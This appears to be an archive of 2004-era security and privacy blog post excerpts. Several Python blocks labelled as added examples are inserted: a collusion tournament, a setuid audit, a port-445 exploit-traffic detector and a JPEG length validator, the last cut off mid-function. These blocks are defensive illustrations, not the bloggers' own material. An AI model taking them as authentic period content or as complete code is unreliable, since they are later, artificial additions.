Michael Froomkin points to Wired’s article Inventor Rejoices as TVs Go Dark, which is enough to make me want a TV-B-Gone. It fits on your keychain, “looks like an automobile remote, has just one button. When activated, it spends over a minute flashing out 209 different codes to turn off televisions, the most popular brands first.” […]

 

Canadian Privacy Law

Michael Geist’s recent … Toronto Star Law Bytes column focuses on a recent Canadian privacy finding involving an inadvertent email disclosure. The column contrasts the finding with a similar incident in the United States and argues that for Canadian privacy law to garner the respect it needs to achieve widespread compliance, the Privacy Commissioner’s office […]

 

$103 Million

To date, the government has wasted over $100 million in a flawed effort to improve airport security by identifying passengers and, well, doing something to the naughty ones. Meanwhile, the reality is that airport screeners continue to miss items like knives, guns and bombs. Meanwhile, there’s lots of good work in computer vision systems, which […]

 

Security and Economics

Household Finance, a unit of HSBC, has sent me a $5,000 check out of the blue. Big verbiage on the front indicates that “Signing this check will result in a loan…” at 23%, which over 5 years comes to an estimated $3,500 in finance charges. Most attractive. Now, ignoring Household’s record of fraud, and ignoring […]

 

Unsecure Flight, Because TSA is Asking For It

The ever-energetic Bill Scannell has set up unsecureflight.com for you to politely but forcefully register your comments with the TSA on what they’re doing to our privacy. Why use Unsecure Flight over the TSA’s site? It’s easier! There is a public record of your comment, the TSA can’t silently discard it. There’s a plethora of […]

 

More on Patches & EULAs

In a comment below, Nudecybot mentions Mark Rasch’s “You Need A Cyber-Lawyer” article in Wired News. I don’t buy this line of reasoning. Making a decent auto-lawyer requires being able to parse legalese, which is a hard problem. Now, legalese is a subset of English, so you might think that the weather parsers, or similar […]

 

Why Profiling Won't Work

WVLT VOLUNTEER TV Knoxville, TN reports: ” Accused Domestic Terrorist Arrested In Knox County.” According to the criminal complaint, the FBI says that Ivan Braden was planning to enter this Armory Friday, armed with guns and bombs. … The feds say the former 278th soldier planned to take people hostage at the Lenoir City Armory and […]

 

Obfuscated Voting Contest

There’s a long running contest to write C code that’s hard to understand. Daniel Horn has taken it one step further: the goal is to write a program that looks right but actually produces bogus counts in one of several ways. It’s brilliant!

 

Good News from the Courts

“We cannot simply suspend or restrict civil liberties until the War of Terror is over, because the War on Terror is unlikely ever to be truly over,” Judge Gerald Tjoflat wrote for the panel. “Sept. 11, 2001, already a day of immeasurable tragedy, cannot be the day liberty perished in this country.” A three judge […]

 

Tied With Alec M.

This site has a Wankometer rating of .58, which is exactly the same level that Alec Muffet got. The White House (1.40) is apparently more wanky than the BBC, but less wanky than Sun. The George Bush and John Kerry for President sites score .63 and 1.83, respectively. I can’t believe Alec is nearly as […]

 

Bush's Certainty

A few days ago, I commented on Bush’s lack of self doubt. Now Ron Suskind takes on the theme in a 10 page article in The New York Times, entitled “Without A Doubt.”

 

Google's Imperfections

The ever-entertaining Nat talks about Google’s desktop search (for Windows), and says “Google shocked the world by releasing something highly imperfect.” Really? Google’s been imperfect a lot lately. Have you tried using Gmail with Safari? It pops up three windows every time you click a link. Orkut? Bad server, no donut. (Actually, the issues seem […]

 

Google and "Privacy"

There’s a critique of Google’s new Desktop Search that it…wait for it…searches your computer! No, really, it does. And so it finds things that are … on your computer! Some of these things, like your email, your spouse’s email, and your IM logs, which Windows keeps hidden between users, are now exposed. This is probably a bad […]

 

Counter-point On ID Cards

The always insightful Michael Froomkin has an article called The Uneasy Case For National ID Cards, which I wanted to link to earlier. I don’t like his arguments, being a believer that privacy invasion is a slippery slope. I expect that laws put in place to protect privacy around a national ID card will be […]

 

John Gilmore, you have a fan

I was flying home recently from a very quick jaunt out to do a customer install. I went to the back of the plane to stretch, and noticed that (horror of horrors) there were people congregating and talking! Fortunately, they were white Americans, so they weren’t scary. Anyway, I got to talking with them, and […]

 

Social Software

Chris Allen has a typically long, thoughtful essay on the history of social software, going back to Vannevar Bush and Memex. I think one of the more interesting transformations was that of collaboration to introduction, with services like LinkedIn or Spoke trying to add practical applications to Milgram’s work on connectedness, and I’m surprised that […]

 

Patches & EULAs

Security patches should not have licenses. There’s no fair re-negotiation under threat. If I bought your software, and am using it, then you find a bug, you should not be allowed to put new terms on the software in order for me to be safe using it. Imagine a hotel which lost a master key […]

 

Department of Justice to Focus On Key Problems!

Attorney General John Ashcroft has announced a major new effort to crack down on intellectual property theft, by which he apparently means illegally-copied DVDs, CDs, and software. (I refuse to use the term piracy to refer to illegal copying. Piracy is the violent boarding and theft of property on ships, and is a major problem […]

 

Financial Cryptography: The Medici Effect

Gramme has a long interview with the author of the Medici Effect over at Financial Cryptography. The book focuses on how the Medicis helped drive the Renaissance by bringing together a slew of people from different cultures and backgrounds. Far too often people become narrowly focused on issues that their peers agree are important. They […]

 

Perverse Cooperation

A new technique has won the 20th anniversary competition in iterated prisoner’s dilemma. The technique involves a sequence of moves designed to signal other players that they are competing with one of the great many other Southampton University submissions. When they discover that, one entry will self-sacrifice such that the other can rack up a […]
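
To see how the signalling trick works, here is a small round-robin tournament, added here as an example; it is not the Southampton team’s code, which isn’t on the page. The five-move handshake, the payoff matrix, the team of one master and three slaves, and the 200-round match length are all assumptions. The point it shows is that the slaves lose badly on purpose so that the master outscores an honest strategy like tit-for-tat.

```python
"""Iterated prisoner's dilemma with a colluding team (added example).

Not the Southampton entries themselves: the handshake sequence, team
size, payoffs and match length below are assumptions for illustration.
"""
from itertools import combinations

C, D = "C", "D"
# Standard Axelrod payoffs as (row player's, column player's): assumption.
PAYOFF = {(C, C): (3, 3), (C, D): (0, 5), (D, C): (5, 0), (D, D): (1, 1)}
HANDSHAKE = [C, D, C, C, D]   # opening sequence that identifies a teammate (assumed)
ROUNDS = 200                  # rounds per match (assumed)


def tit_for_tat(mine, theirs):
    """Cooperate first, then copy the opponent's last move."""
    return C if not theirs else theirs[-1]


def always_defect(mine, theirs):
    return D


def colluder(role):
    """A team member: play HANDSHAKE, then check whether the opponent did too."""
    def play(mine, theirs):
        n = len(mine)
        if n < len(HANDSHAKE):
            return HANDSHAKE[n]                     # still signalling
        if theirs[:len(HANDSHAKE)] != HANDSHAKE:
            return D                                # outsider: defect for the rest
        return D if role == "master" else C         # teammate: master takes, slave gives
    return play


def match(a, b, rounds=ROUNDS):
    """Play one match between strategies a and b; return (score_a, score_b)."""
    hist_a, hist_b = [], []
    score_a = score_b = 0
    for _ in range(rounds):
        move_a, move_b = a(hist_a, hist_b), b(hist_b, hist_a)
        pay_a, pay_b = PAYOFF[(move_a, move_b)]
        score_a += pay_a
        score_b += pay_b
        hist_a.append(move_a)
        hist_b.append(move_b)
    return score_a, score_b


def tournament(players):
    """Round robin, each pair once, no self-play; return {name: total score}."""
    totals = {name: 0 for name in players}
    for (name_a, a), (name_b, b) in combinations(players.items(), 2):
        score_a, score_b = match(a, b)
        totals[name_a] += score_a
        totals[name_b] += score_b
    return totals


# One master and three slaves against two honest strategies (assumed line-up).
PLAYERS = {
    "tit_for_tat": tit_for_tat,
    "always_defect": always_defect,
    "master": colluder("master"),
    "slave_1": colluder("slave"),
    "slave_2": colluder("slave"),
    "slave_3": colluder("slave"),
}

if __name__ == "__main__":
    for name, total in sorted(tournament(PLAYERS).items(), key=lambda kv: -kv[1]):
        print(f"{name:14} {total}")
```

Against this line-up the master finishes far ahead of tit-for-tat, entirely on points harvested from its own teammates: every slave gives the master 195 rounds of the temptation payoff, and against outsiders the colluders simply defect. The same idea is what a Sybil attack does to any reputation scheme where the attacker can enter many identities.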

 

Perverse Incentives

“It’s O.K. to spend $85 on a hotel, $15 for parking and another $15 for breakfast, but if you spend $90 for a hotel where parking and breakfast are included, you’re over budget,” he said. “And it’s O.K. to drive 400 miles in your own car and to get reimbursed at 34 cents per mile, […]

 

"A Sign Of The Times?"

A woman said she drove home to San Diego from Denver rather than submit to what she viewed as an intrusive search by airport security screeners. Ava Kingsford, 36, of San Diego said she was flagged down for a pat-down search at Denver International Airport last month as she prepared to board a flight home […]

 

Federal Anti-terror Money Well Spent

Ok, you know I’m being sarcastic with the title. The New York Times titles its article “Security Grants Still Streaming To Rural States.” And the message is politics remains more important than ensuring that those cities likely to be hit next are well prepared. The article goes on to cite politics as usual as the […]

 

J8 RUSITH?

So it seems that Apple installs /bin/ps setuid root. (Scare #1). It seems also that the last bits emitted by a ‘strings /bin/ps’ are J8 RUSITH? . I have no idea what that is or what it means, but I think it belongs on a tshirt. (Thanks to Dave and Ted for validating those for […]
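
If that worries you, the useful check is to enumerate every setuid-root binary on the box rather than stumble on them one at a time. The script below is an added example, not Apple’s code or anything from the post: it walks a tree with os.lstat (so symlinks are not followed) and sorts what it finds into setuid-root, setuid-other-user and setgid. The sample entries it ships with are constructed stand-ins for real stat results.

```python
"""Enumerate setuid/setgid files and flag the ones owned by root (added example).

Not from the original post; paths in SAMPLE are constructed stand-ins
for real lstat results.
"""
import os
import stat
from typing import Iterable, NamedTuple


class Entry(NamedTuple):
    path: str
    mode: int   # st_mode as returned by os.lstat
    uid: int    # owner uid


def is_setuid_root(entry: Entry) -> bool:
    """True for a regular file with the setuid bit set and owned by uid 0."""
    return (stat.S_ISREG(entry.mode)
            and bool(entry.mode & stat.S_ISUID)
            and entry.uid == 0)


def is_setgid(entry: Entry) -> bool:
    return stat.S_ISREG(entry.mode) and bool(entry.mode & stat.S_ISGID)


def classify(entries: Iterable[Entry]) -> dict:
    """Split entries into setuid-root, other setuid, and setgid path lists."""
    report = {"setuid_root": [], "setuid_other": [], "setgid": []}
    for e in entries:
        if is_setuid_root(e):
            report["setuid_root"].append(e.path)
        elif stat.S_ISREG(e.mode) and e.mode & stat.S_ISUID:
            report["setuid_other"].append(e.path)
        if is_setgid(e):
            report["setgid"].append(e.path)
    return report


def walk(root: str) -> Iterable[Entry]:
    """Yield an Entry for every directory entry under root, without following symlinks."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished: skip rather than abort the audit
            yield Entry(path, st.st_mode, st.st_uid)


# Constructed sample entries (modes in octal) standing in for real lstat output.
SAMPLE = [
    Entry("/bin/ps", stat.S_IFREG | 0o4755, 0),             # setuid root: flag it
    Entry("/usr/bin/cat", stat.S_IFREG | 0o755, 0),         # plain root-owned binary
    Entry("/home/alice/tool", stat.S_IFREG | 0o4755, 501),  # setuid, but not root
    Entry("/usr/bin/wall", stat.S_IFREG | 0o2755, 0),       # setgid only
    Entry("/usr/bin/link", stat.S_IFLNK | 0o4755, 0),       # symlink: mode bits ignored
]

if __name__ == "__main__":
    # Real scan of /bin; needs no privileges, since lstat works on anything you can see.
    for path in classify(walk("/bin"))["setuid_root"]:
        print("setuid root:", path)
```

Run it over / (or /bin, /sbin, /usr) and diff the output against the previous run; a new setuid-root file appearing after a software install is exactly the kind of thing that should prompt a second look, as /bin/ps did here.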

 

Bush, Socrates, and Information Security

“Wherein links between a number of disparate ideas are put forth for the amusement of our readers” Orcinus talks about one of Bush’s answers to a question in last night’s debate.* (I thought Bush did surprisingly well, but think that Kerry still came out slightly ahead. Both, depressingly, still want to spend my money on […]

 

Secondary Screening

Ryan Singel has a couple of good posts up: Why Privacy Laws and Advocates Matter and Trusty Logo Not Worth The Pixels It Is Printed On. The latter explains in detail what economics predicts: Trusty won’t shaft its paying customers to make them actually enforce privacy policies, when people who rely on the trusty seal […]

 

Afghan Elections

The elections in Afghanistan have apparently gone off with fewer problems than expected, which is outstanding. (And hey, the ink I mentioned to Sama makes an appearance!) I am slightly worried by a line in The New York Times article, ” International organizations, which spent $200 million to finance the election, indicated that they had […]

 

Quicktunes

I listen to a lot of music. When I visit friends, I often invite them to drop random discs they think I’d like into iTunes for a rip. Combine that with my cd habit (“I can quit anytime!”), and I have a fair bit of music that I don’t recognize quickly. So I just found […]

 

Want to Save American Lives?

Do you want to save American lives? Stop senseless deaths? Here’s some ideas: Require real driver training, and enforce traffic laws. Ration the sale of alcohol to prevent the nasty diseases over-indulgence causes. Ban tobacco. Ban firearms. Require calisthenics in the morning, by neighborhood, and in the afternoon, at work. Ban the use of corn […]

 

Can Prayers Heal?

There’s an article in today’s The New York Times asking, Can Prayers Heal? (Critics Say Studies Go Past Science’s Reach). The article talks about a number of studies that apparently show a correlation between being prayed for and better medical results. The article also talks about how flawed some of the studies are, once you […]

 

Apple Security UI

I just got a fascinating email. No, not really. It was a simple little email, from someone who’s being very helpful on a project that I’ll speak of in excruciating detail later. What was fascinating about it was that it was PKCS 7 signed, and Apple’s Mail.app told me so. It told me so with […]

 

ACLU vs. Ashcroft

The ACLU has made the TSA explain to the American people some subset of the faulty reasoning, faulty processes, and broken systems behind the so-called “No fly” lists, which have now snared, along with Johnnie Thomas and David Nelson (all of them), 3 members of Congress. Read the articles, Faulty ‘No-Fly’ System Detailed (Washington Post) […]

 

The FBI and Library Subpoenas

Orin Kerr discusses (deep breath!) Michael Froomkin links (via Proof Through the Night) to this story from a Seattle TV station about a local library that has fought off an FBI subpoena for a list of names and addresses of who took out a book on Osama bin Laden. Kerr does a good job of […]

 

Virginia Misses Point, Over-reacts

In response to 9 hijackers getting fraudulently issued ID cards from the state DMV, Virginia is considering issuing harder-to-fake ID cards that will broadcast your identity. As long as the value of an id card keeps going up, the reward for breaking the system will go up as well. If you want to rely on […]

 

Use Blogger, Be Ignored

Every now and then, I come across a blog I want to skim regularly. When it’s easy to do so, I add it to my list. Which is to say I drop the RSS feed at NetNewswire, and I then at least see the headlines. Blogspot/Blogger doesn’t make it easy to add RSS to your […]

 

How Banning Wireless Reduces Security

IDC’s research director, Lars Vestergaard, said their research found interest by businesses in WLAN usage was widespread, but not many of them were particularly interested. “Unfortunately IT managers are being uncertain about using this technology, but they use a lot of bad excuses,” he said. “This is because they often fear a lack of security […]

 

Electronic Voting Machines Will Destroy American Democracy

If you somehow missed it, AP released a “test article” claiming Bush had won re-election. BoingBoing has the story, and screen captures of a web site that carried it. We all know that computers don’t make mistakes, and that software is bug-free. More seriously, we need to take a lesson from Florida, and understand that […]

 

Taxonomic Software

A small window into a large world, with its own software: biological software, including DELTA, a DEscription Language for TAxonomy, database software, ecology software, morphometric, paleontologic, and phylogenetics software. (Hey, I need a taxonomy just to keep the breakdowns straight!) Or DMOZ has a page, but it doesn’t seem as comprehensive. What I want to […]

 

Taxonomies

Biological taxonomy is not fixed, and opinions about the correct status of taxa at all levels, and their correct placement, are constantly revised as a result of new research, and many aspects of classification will always remain a matter of judgement. The ITIS database is updated to take account of new research as it becomes […]

 

Factcheck.com, the story

As anyone who takes advice from the Vice President now knows, he didn’t really mean to tell you to go to factcheck.com, but factcheck.org, whose article still doesn’t fully support his point. This little glitch led the owners of factcheck.com, a small site that lists sellers of dictionaries and encyclopedias, to suffer a massive denial […]

 

Editing MacOS X menus

There are useful instructions here as to how to add a “Paste as Plaintext” option to iChat. If you’re reasonably technical, you can go off and do all sorts of neat stuff here.

 

Cool maps

Christopher Allen has a cool post about a map mash up, along with some analysis of what makes it work.

 

Calls for Papers

There’s a set of interesting conferences looking for papers: Privacy Enhancing Technologies Economics of Information Security Codecon [update: closed html list tag]

 

Ranum on the root of the problem

Marcus Ranum writes a good article for ACM Queue, in which he points out that better tools to improve languages can help. I take issue with his claim that better languages can’t help. Java, because of its string representation, is harder to mess up than C. It’s not perfect, and no useful language can […]

 

Economics of Information Security

Jean Camp and Stephen Lewis have done a great job of bringing together papers on Economics of Information Security in a new volume from Kluwer Academic press. (It’s even better because it has my first book chapter, which is What Price Privacy, joint work with Paul Syverson. We’ll put it online as soon as the […]

 

How about "Align with the business?"

I normally have a lot of respect for CIO Magazine. Their journalists cover the topics that matter to CIOs, they remain focused on how to make the technology support the business, etc. That’s why I was surprised to see this CIO’s Guide To Safe Computing, which starts: Ellyn believes that companies should strive for a […]

 

0wned in 60 seconds

0:56 – A student system in Founders scanned victim on TCP port 445 (file sharing). Victim responded. Student system immediately closed connection and opened a new connection on victim port 445. Following LAN Manager protocol negotiation and MS/DCE RPC Bind, student system attacked victim with buffer overflow to exploit Microsoft LSASS vulnerability. Less than 60 […]
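
The shape of that timeline, a probe on 445 that is closed at once and then a fresh connection carrying a payload, is something you can pick out of flow records without any signature for the exploit itself. The detector below is an added example, not from the post or the incident report it quotes: the flow-record layout, the sample flows and the thresholds are all assumptions, and it flags the behaviour, not the LSASS bug.

```python
"""Flag probe-then-payload connection pairs on TCP/445 (added example).

Not from the post or the incident report it quotes. The Flow layout,
SAMPLE_FLOWS and the thresholds are constructed/assumed; this is a
behavioural heuristic, not a signature for the LSASS exploit.
"""
from collections import defaultdict
from typing import List, NamedTuple, Tuple


class Flow(NamedTuple):
    t: float         # connection start, seconds
    src: str
    dst: str
    dport: int
    bytes_out: int   # application bytes sent by src
    duration: float  # seconds the connection stayed open


PROBE_MAX_BYTES = 0        # a scan probe sends no application data (assumed)
PROBE_MAX_DURATION = 0.5   # and is closed immediately (assumed)
FOLLOWUP_WINDOW = 5.0      # seconds allowed between probe and payload flow (assumed)
PAYLOAD_MIN_BYTES = 1024   # SMB negotiate + RPC bind + overflow exceeds this (assumed)


def find_probe_then_payload(flows: List[Flow], port: int = 445) -> List[Tuple[str, str, float]]:
    """Return (src, dst, t_payload) for each probe quickly followed by a payload flow."""
    by_pair = defaultdict(list)
    for f in sorted(flows, key=lambda f: f.t):
        if f.dport == port:
            by_pair[(f.src, f.dst)].append(f)

    hits = []
    for (src, dst), pair_flows in by_pair.items():
        for i, probe in enumerate(pair_flows):
            if probe.bytes_out > PROBE_MAX_BYTES or probe.duration > PROBE_MAX_DURATION:
                continue  # carried data or stayed open: not a bare probe
            for later in pair_flows[i + 1:]:
                if later.t - probe.t > FOLLOWUP_WINDOW:
                    break  # too far apart to be the same sequence
                if later.bytes_out >= PAYLOAD_MIN_BYTES:
                    hits.append((src, dst, later.t))
                    break
    return hits


# Constructed flows, not real traffic: one attacker, one lone probe, one normal session.
SAMPLE_FLOWS = [
    Flow(56.0, "10.1.1.50", "10.1.2.7", 445, 0, 0.01),     # probe, closed immediately
    Flow(56.2, "10.1.1.50", "10.1.2.7", 445, 4200, 3.0),   # reconnect with a payload
    Flow(60.0, "10.1.1.8", "10.1.2.7", 445, 0, 0.01),      # lone probe, no follow-up
    Flow(61.0, "10.1.3.9", "10.1.2.7", 445, 9000, 120.0),  # ordinary file-sharing session
    Flow(70.0, "10.1.1.50", "10.1.2.8", 80, 0, 0.01),      # same pattern on port 80: ignored
    Flow(70.5, "10.1.1.50", "10.1.2.8", 80, 5000, 2.0),
]

if __name__ == "__main__":
    for src, dst, t in find_probe_then_payload(SAMPLE_FLOWS):
        print(f"probe-then-payload: {src} -> {dst}:445 at t={t}")
```

The lone probe and the long-lived file-sharing session both fall through: the first has no follow-up, the second never looked like a scan. Tune PAYLOAD_MIN_BYTES against your own baseline of legitimate SMB sessions before trusting the alert.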

 

"What's The Cybersecurity Czar's Job?"

But while we consider whether the position should be upgraded, we should also ask what the cybersecurity czar should be doing in the first place. says Ed Felten, and he’s right. He suggests two main jobs: Securing the fed’s infrastructures (and in doing so, pulling for more secure product), and imposing liability rules. Ed correctly […]

 

Spaceship One Lands!

Watching the NASA video: SpaceShipOne has just won the X Prize, having reached space twice in under 14 days. Congratulations to Burt Rutan and his whole team.

 

Cherishing the Customer, Redmond Style

My 12-year-old at home doesn’t want to hear that he can’t put all the music that he wants in all of the places that he would like … says Steve Ballmer. It’s good to see Microsoft, like the health care industry, catering to people other than end-users. If they were as smart collectively as they […]

 

Cool Mac Utility

That said: my home directory is now encrypted which should make any further hardware maintenance a doddle (no more erase/flood before mailing) and I’ve blown-away the old UFS partition which although useful was tying up a few too many Gb. Alas the rebuild doesn’t seem to have fixed the lack-of-sleep-on-lid-closure problem. One more for Applecare. […]

 

Why Is Private Health Insurance Such A Disaster?

Why cannot markets allocate this function to the least cost decider? Why does the usual solution — intermediation — appear to be working so badly? Asks Tyler Cowen over at Marginal Revolution. I believe that a large part of the problem comes from a side effect of the employer subsidy. Because health insurers are selling […]

 

More on Amit Yoran

The House will propose moving cybersecurity offices from the Department of Homeland Security to the White House as part of the intelligence reorganization, according to draft legislation obtained Wednesday by The Associated Press. The bill, expected to be introduced Thursday, would place cybersecurity into the White House budget office. … The new proposal would create […]

 

The Blog That Broke the Bank of England

You have to respect a man who can take on a central bank and win. The Motley Fool did a nice bio piece with background. And now, he’s blogging. [Update: Oops! Via BoingBoing]

 

Secondary Screening

Ryan Singel has a great post on the watch lists, and the keystone-cops fumbling behind the scenes.

 

A Million Deaths Is A Statistic

Matt Cordes modified the Zombie simulators to give humans a chance to fight back. It’s fascinating, because with some small mods to the source, you get a much more interesting simulation. (Unfortunately, I don’t see Matt’s source anywhere, so I can’t say how long it might have taken.) The simulation makes viscerally clear how chains […]

 

Shaun of the Dead

I saw the excellent Shaun of The Dead last night. (Or see Quicktime trailers or the official site. Or heck, just buy it from Amazon.co.uk where it’s already available on DVD, but only if you have a free-world DVD player. Ok, really this post is an excuse to link to the Zombie Infection Simulation in […]

 

That settles it

One of the best signs that things are going down the tubes is that officialdom tries to control information flow. I now know that things in Iraq are officially going to hell, because the security situation is bad enough that they’re trying to prevent people from learning about it. Kroll, a large physical and investigative […]

 

Amit Yoran resigns

Amit Yoran, a former software executive from Symantec Corp., informed the White House about his plans to quit as director of the National Cyber Security Division and made his resignation effective at the end of Thursday, effectively giving a single day’s notice of his intentions to leave. Yoran said Friday he ”felt the timing was […]

 

Why Is Air Travel So Cheap?

The cost of a last-minute ticket doesn’t seem to be enough for airlines to break even. How much of this is due to a lingering fear of flying? How much of it is the extra cost to travelers, in inconvenience and hassle, of being bit players on the security stage? As long as a carrier […]

 

Iraq

I’ve realized recently that I have no real idea of what’s happening in Iraq. On the one hand, we have bubbly optimists like Chrenkoff. On the other, people like Wall St Journal reporter Farnaz Fassihi, whose email is getting wide circulation. The Iraqi bloggers I read (generally) sound more optimistic than despairing, which is good. […]

 

Nevada Gaming Commission vs. Diebold

It’s always good to see our best resources being applied to the most important things in society, like voting. The “independent” validation, paid for by the software creators, is closed to the public. But when the Nevada Gaming Commission gets into the act, it seems they know a scam when they see one. (Disclaimer: I […]

 

A message from God?

Bob Morris maps hurricanes Ivan, Charley, and Frances against voter maps. (No mention of Jeanne, which seems to have taken the same path as Frances.) Enquiring minds want to know, is this that Bob Morris?

 

Travel, Speaking Plans in October

I’m speaking at the Atlanta Chapter of the High Tech Crime Investigative association, October 11th, on a “Privacy Industry View of Reducing Cybercrime.” This is an extended version of Zero-Knowledge’s talk we gave to law enforcement. I’m speaking at the Inaugural Security Leadership conference, in Arlington, Texas on the 19th, on “Beyond Penetrate, Patch and […]

 

"A Roadmap for Forgers"

Ed Felten has a great post over at Freedom To Tinker about Rather-Gate: In the recent hooha about CBS and the forged National Guard memos, one important issue has somehow been overlooked — the impact of the memo discussion on future forgery. There can be no doubt that all the talk about proportional typefaces, superscripts, […]

 

Cultural Imperialism At Its Best

Abdul Hadi al-Khawaja is being detained for 45 days over charges of inciting hatred against the [Bahrain] regime. His Bahrain Centre for Human Rights (BCHR) ignored warnings it had contravened association laws, a government statement said. The centre had protested at the arrest, saying Mr Khawaja was just “practising his basic rights, namely free speech”. […]

 

"Tomorrow is Zero Hour"

More than 120,000 hours of potentially valuable terrorism-related recordings have not yet been translated by linguists at the Federal Bureau of Investigation, and computer problems may have led the bureau to systematically erase some Qaeda recordings, according to a declassified summary of a Justice Department investigation that was released on Monday. The problems, unsurprisingly, are […]

 

The Two 9/11 Commission Reports

I’ve just finished the 9/11 commission’s report. (Or use the Pdfhack version, a fine example of what can be done in the absence of copyrights.) One of the things that stands out for me is the stark contrast between the history and the recommendations. The history is excellent. The recommendations, less so. My largest critique […]

 

Appreciating Shakespeare

Recently, I found myself wondering why Hamlet had never gotten a proper treatment in Powerpoint. After another drink, I took it upon myself to remedy the situation.

 

"You will eventually be caught"

I believe that if you are a low- to mid-skilled intruder physically located in the United States, you will eventually be caught. The days when hardly anyone cared about prosecuting digital crime are ending. The FBI has 13 Computer Hacking and Intellectual Property (CHIPS) units with plans to open more. The Computer Crime and Intellectual […]

 

Firefox Software Install UI

This changed recently — spyware ‘toolbars’ started to appear for Firefox as well. It was quite a surprise to see a dialog pop up when accessing an otherwise normal-looking (though advertising-heavy) page, using my Linux desktop, prompting me to install some ‘toolbar’ .xpi file! Firefox 1.0PR now includes code to deal with this. Here’s how […]

 

Airport Screening Still Fails Tests

Do current security plans depend on no guns getting onto the planes? I hope not. Covert government tests last November showed that screeners were still missing some knives, guns and explosives carried through airport checkpoints, and the reasons involve equipment, training, procedures and management, according to a report by the inspector general of the Homeland […]

 

Verisign's Kid Credentials

So Verisign has teamed up with I-safe to issue “USB tokens” to children. The ZDnet story states that it “will allow children to encrypt e-mail, to access kid-safe sites and to purchase items that require a digital signature, said George Schu [A Verisign VP].” To me that sounds a lot like an X.509 certificate, which […]

 

What's In A Name?

“BRANSON, Mo. – A Branson man has put a face to the anonymous references people often make to “they” by changing his name to just that: “They.” Not only is he making a statement about his name, but he’s messing with the entire English language,” friend Craig Erickson said. How can you argue with messing […]

 

"Post-Totalitarian Stress Disorder"

This – the damage done to individual psyche – and not just to the physical infrastructure and institutions of the country, is what we have to always keep in mind when assessing the progress of reconstruction and democratisation in places like Iraq. If things aren’t moving ahead as fast as expected, if cooperation is lacking […]

 

Acceptable ID

Virginia Postrel writes about flying without ID: Coming home today from New York, I was a little more prepared. I still didn’t have “government-issued i.d.,” but at least I knew I was headed for trouble. I got to JFK several hours early. The young security guard wasn’t sure what to do with me and asked […]

 

account.management@gmail.com

So when Google Mail started up, I managed to register “account.management@gmail.com.” I didn’t have any particular plan for this, I just figured that it was entertaining, and a good, harmless prank could be made of it. (I specifically emailed a friend who works for Google security about it, and mentioned it in person next time […]

 

"All Persons Held As Slaves Shall Be Forever Free"

Happy Emancipation Proclamation Day! On Sept 22, 1862, President Lincoln issued the Emancipation Proclamation: “…all persons held as slaves within any State or designated part of a State the people whereof shall then be in rebellion against the United States shall be then, thenceforward, and forever free; Now, like many government proclamations, there was more […]

 

Testing Airline Data for …what?

The New York Times reports that “The Transportation Security Administration said Tuesday that it planned to require all airlines to turn over records on every passenger carried domestically in June, so the agency could test a new system to match passenger names against lists of known or suspected terrorists.” The data will vary by airline. […]

 

Iraqis Target Foreigners

Omar writes about A group of Iraqi citizens in Al Karkh/ Khidr Al Yas arrested 6 Syrian terrorists after placing a land mine at the gate of Bab Al Mu’a dam bridge from Al Karkh side. According to New Sabah newspaper, after a road side bomb exploded missing an American convoy that was patrolling in […]

 

CAPPS as Corporate Welfare

I’ve written in the past about how government-validated ID acts as a subsidy to privacy invasion. In the absence of such a card, I can give you whatever name I want, protecting my privacy. With such a card, it becomes easy to invade people’s privacy. Under CAPPS-2, the government would like the airlines to collect […]

 

Testing Airline Customers

Ed Hasbrouck has another pair of good posts (1, 2) on the “Free Wheelchairs” program. In the first one, he quotes from “Department of Homeland Security Appropriations Act, 2005”, H.R. 4567: (2) the underlying error rate of the government and private data bases that will be used both to establish identity and assign a risk […]

 

New York Protests

Eugene Volokh rightly criticizes a correspondent for his ad hominem attacks on NYC Mayor Bloomberg, who said (I’m quoting Volokh): But Bloomberg insisted that there’s no proof that the NYPD did anything wrong. “There is absolutely no evidence whatsoever that there was any intent by any law-enforcement official to hold people any longer than was absolutely […]

 

AT&T Wireless time service

I have cell service with AT&T wireless. One feature of the service is network time updates. It fortunately includes a confirmation. It’s great when you land in a new city. It hasn’t been so great last night or today. Last night, at 23.20, I got an update telling me that the new time was 21.15. […]

 

Jefferson Nickels

Samablog points to the new nickel design which will have either a buffalo or a depiction of the pacific coast on the back. The buffalo refers to the Louisiana Purchase, while the pacific coast refers to Lewis and Clark’s expedition . Despite his careers as a lawyer, diplomat, Secretary of State, and President of the […]

 

Free gropes for travellers

Over at BoingBoing, Cory points to a USA Today story at NewsIsFree about more screening. There seem to be four components: Explosives Detection Secondary screening will now always include nitrate detection swabbing. This is a fine step, but why has it taken 3 years to come in? (In fact, every time I’ve been thrown into […]

 

Qui Custodes Custodiat?

There’s a brilliant post over at Orcinus about the 9/11 commission, whose (outstanding) report I’m just getting around to reading. Really, if the Kerry campaign is serious about persuading the American public that Bush is a serious liability when it comes to securing the nation from the terrorist threat, this should be Exhibit A: Bush […]

 

Ian Grigg on Verisign

Ian Grigg has some very interesting comments on Verisign’s certificate business and what it means for privacy, over at Financial Cryptography

 

Bin Laden Unit downsized?

The New York Times reports: The Central Intelligence Agency has fewer experienced case officers assigned to its headquarters unit dealing with Osama bin Laden than it did at the time of the attacks, despite repeated pleas from the unit’s leaders for reinforcements, a senior C.I.A. officer with extensive counterterrorism experience has told Congress. A senior […]

 

Mozilla Patches

The Mozilla folks have awarded their first bug bounty payments for 14 security issues. Time to upgrade!

 

Microsoft JPG Bug, Patch, Tool

Microsoft has released a critical advisory (or, less-technical version) regarding a problem with the way JPEG files are parsed. Microsoft has released patches for their applications, and also a tool to scan for vulnerable apps. I’m not sure what to think about the tool. On the one hand, good for them! Helping customers secure their […]
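
The advisory says only that the problem is in how JPEG files are parsed, so here, as an added example rather than Microsoft’s code or a reconstruction of their bug, is the check any JPEG segment walker has to get right. Every segment after the SOI marker carries a 16-bit big-endian length that counts its own two bytes; a value below 2, or one that reaches past the end of the buffer, has to be rejected before it is used in any arithmetic. The sample files are constructed.

```python
"""Walk JPEG marker segments and validate every length field (added example).

Not Microsoft's code and not a reconstruction of the bug in the advisory.
GOOD, BAD_LENGTH and TRUNCATED are constructed byte strings.
"""
import struct
from typing import List, Tuple

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM, RST0-RST7.
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))


def parse_segments(data: bytes) -> List[Tuple[int, bytes]]:
    """Return (marker, payload) for each segment up to SOS or EOI; raise on bad input."""
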